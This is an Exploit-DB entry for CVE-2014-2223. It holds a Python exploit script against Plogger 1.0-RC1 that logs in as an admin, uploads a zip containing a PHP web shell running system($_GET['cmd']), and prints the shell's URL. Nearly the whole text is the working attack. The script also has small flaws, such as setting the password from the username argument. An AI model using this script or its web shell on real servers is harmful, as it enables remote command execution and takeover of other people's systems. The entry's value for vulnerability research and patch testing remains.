Plogger 1.0-RC1 - (Authenticated) Arbitrary File Upload

EDB-ID:

34447


Author:

b0z

Type:

webapps


Platform:

PHP

Date:

2014-08-28


#!/usr/bin/env python


# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223

import hashlib
import os
import zipfile

import requests
import time
import argparse



def login(session,host,username,password):
    print "[+] Log in"

    session.post('http://%s/plog-admin/plog-upload.php' % host, data={
        "plog_username": username,
        "plog_password": password,
        "action": "log_in"
    })

def upload(session):
    print "[+] Creating poisoned gift"
    ## Write the backdoor
    backdoor = open(magic + '.php', 'w+', buffering = 0)
    backdoor.write("<?php system($_GET['cmd']) ?>")
    backdoor.close

    # Add true image file to block the race condition (mandatory not null)
    image = open(magic + '.png', 'w+', buffering = 0)
    image.write('A')
    image.close

    gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
    gift.write(magic + '.php')
    gift.write(magic + '.png')
    gift.close

    os.remove(magic + '.php')
    os.remove(magic + '.png')

    gift = open(magic + '.zip', 'rb')
    files= { "userfile": ("archive.zip", gift)}
    session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
        data = {
            "destination_radio":"existing",
            "albums_menu" : "1",
            "new_album_name":"",
            "collections_menu":"1",
            "upload":"Upload"
    })

    os.remove(magic + '.zip')
    print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)

if __name__== "__main__":

    parser = argparse.ArgumentParser()
    parser.add_argument("--host"        , help="Remote host",required=True)
    parser.add_argument("--user"        , help="Username",required=True)
    parser.add_argument("--password"    , help="Password",required=True)
    args = parser.parse_args()

    host     = args.host
    username = args.user
    password = args.user

    magic = hashlib.sha1(time.asctime()).hexdigest()

    session = requests.session()
    login(session,host,username,password)
    upload(session)